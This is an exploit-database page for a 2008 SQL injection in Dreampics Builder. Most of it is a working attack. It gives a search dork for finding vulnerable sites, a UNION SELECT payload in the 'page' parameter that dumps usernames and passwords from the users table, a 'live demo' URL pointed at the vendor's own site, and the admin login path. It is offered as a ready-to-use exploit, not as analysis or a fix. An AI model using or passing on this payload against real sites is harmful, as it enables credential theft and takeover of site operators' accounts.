[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dreampics Builder (page) Remote SQL Injection Vulnerability

Author
Hussin X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3377
Category
web applications
Date add
08-07-2008
Platform
unsorted
===========================================================
Dreampics Builder (page) Remote SQL Injection Vulnerability
===========================================================



#########################################################
#
#     PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#=========================================================    
#
#    script :  http://www.dreamlevels.com/dreampics.php
#
#    DorK   :   powered by Dreampics Builder
#     
##########################################################

Exploit: 

www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--


L!VE DEMO:

http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users--


Admin Login :

/admin/



#  0day.today [2024-12-25]  #